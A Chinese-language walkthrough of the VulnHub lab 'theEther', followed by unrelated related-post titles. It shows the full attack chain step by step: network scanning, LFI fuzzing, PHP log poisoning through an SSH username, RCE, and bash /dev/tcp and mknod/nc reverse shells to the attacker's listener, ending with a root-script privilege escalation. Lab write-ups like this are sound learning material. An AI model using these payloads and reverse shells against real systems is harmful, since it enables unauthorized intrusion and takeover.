一、IP探测

arp-scan -l

靶机IP为172.20.10.3

二、端口扫描

nmap -sV -T4 -p- -A 172.20.10.3

只开放了80端口。

三、端口分析(80端口)

这里有一个参数,可以包含本地文件。这是一个可以利用的点。其他的就没有找到什么了。

四、漏洞利用

这个参数可以爆破一下后台文件。

可以先用dirb试试。

dirb http://172.20.10.3

扫到了一些路径但基本都是index,没什么用。

要用参数爆破,利用burpsuite的intruder模块爆破file参数。

选用LFI的字典

字典链接:https://github.com/danielmiessler/SecLists

字典名为LFI-Jhaddix.txt

前几个是访问成功的,可以看到是日志文件。

auth.log的状态码是302,有重定向。点击查看数据包。

可以看到日志,因此可以考虑日志注入,也就是通过执行命令然后在日志中查看操作及对应结果。

先通过ssh注入一段php代码

ssh '<?php system($_GET[cmd]);?>'@172.20.10.3

密码随便填

然后查看日志

可以通过curl命令查询。

curl http://http://172.20.10.3/?file=/var/log/auth.log

发现了这条ssh连接记录,但是用户名被隐藏了。

curl 'http://172.20.10.3/index.php?file=/var/log/auth.log&cmd=ls'

看到了ls的结果,说明可以RCE。

构造payload反弹shell。

#新开一个终端然后输入以下命令
 nc -lvvp 1234
 #即监听1234端口

在原终端中输入

curl 'http://172.20.10.3/index.php?file=/var/log/auth.log&cmd=bash -i >& /dev/tcp/172.20.10.2/1234 0>&1'

需要url编码。

curl 'http%3A%2F%2F172.20.10.3%2Findex.php%3Ffile%3D%2Fvar%2Flog%2Fauth.log%26cmd%3Dbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.20.10.2%2F1234%200%3E%261'

还是不行,可能是这种反弹方法有问题。换一个反弹方法

mknod backpipe p && nc 172.20.10.2 1234 0<backpipe | /bin/bash 1>backpipe

进行url编码然后加上curl命令

curl 'http://172.20.10.3/index.php?file=/var/log/auth.log&cmd=mknod+backpipe+p+%26%26+nc+172.20.10.2+1234+0%3Cbackpipe+%7C+%2Fbin%2Fbash+1%3Ebackpipe'

后续由于笔者的环境出现了问题,换到了另一台电脑上进行了后续操作。没有截图,只能口述了。。。

后续打开xxxlogauditorxxx.py的脚本,发现特别长。

尝试运行一下

输入命令

/var/log/auth.log | ls /root

看到了一个flag.png的文件,复制到公共目录temp用wget命令下载下来。

打开发现不是,用cat命令查看看到base64编码,解码一下就是flag。

Vulnhub-theEther相关推荐

  1. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  2. VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE

    VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE 环境下载 THE ETHER: EVILSCIENCE靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 ...

  3. 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!

    Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...

  4. Vulnhub靶机渗透之 RAVEN: 1

    目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...

  5. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  6. 【Vulnhub靶机系列】DC2

    基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...

  7. 【Vulnhub靶机系列】DC1

    基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...

  8. 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞

    JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...

  9. 靶场练习第二十二天~vulnhub靶场之Momentum-2

    一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...

  10. 靶场练习第二十五天~vulnhub靶场之Raven-2

    一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...

最新文章

  1. 阿里数学竞赛可以报名了!奖金增加到400万元,题目面向大众公开征集
  2. 医失眠灵验方--五味子50g 茯神50g 合欢花15g 法半夏15g
  3. 【GDKOI2003】最大公共子串
  4. cvtcolor python opencv_蔡徐坤教你用OpenCV实现素描效果
  5. 笔记本安装win7和arch linux双系统+xfce4桌面
  6. java获取xlsx某列数据_Java读取Excel指定列的数据详细教程和注意事项
  7. BroadLeaf项目搜索功能改进
  8. 计算机组成加速比例题,计算机体系结构大题预测
  9. spring boot 邮件端口_不会吧,SpringBoot还能发送邮件发送邮件?快来看看如何操作吧...
  10. 谷歌免费域名邮箱申请全解
  11. linux和windows截图软件下载,【教程】数字菌教你从windows过渡到linux之软件的替换...
  12. 我们是如何认识这个世界的呢
  13. 上传Android library到JitPack
  14. 程序员电脑(减少辐射)(¥37)
  15. Unittest-单元测试3
  16. origin如何绘制双y轴曲线_origin怎样画双y轴 看完恍然大悟
  17. 【期末复习】计算机网络 谢希仁版(六)应用层
  18. 算法 + 算法 = 新算法
  19. FPGA 之 SOPC 系列(九)SOPC 补充:altera与xilinx对比
  20. 计算机图形学(三)——画一个矩形

热门文章

  1. 第四回 还君明珠双泪垂,恨不相逢未嫁时
  2. BZOJ4872 [SHOI2017]分手是祝愿
  3. C语言 正序输出数字
  4. php 提取数字,php如何实现只取数字的功能
  5. 3D结构光摄像头深度算法 转载
  6. 主从概念以及主从的相关知识
  7. JS获取当前时间的前一个小时及格式化时间
  8. 布朗大学计算机专业怎么样,布朗大学的计算机专业如何?
  9. USB设备驱动程序-USB Gadget Driver(四)
  10. 3年级计算机课程安排,人教版三年级信息技术教学计划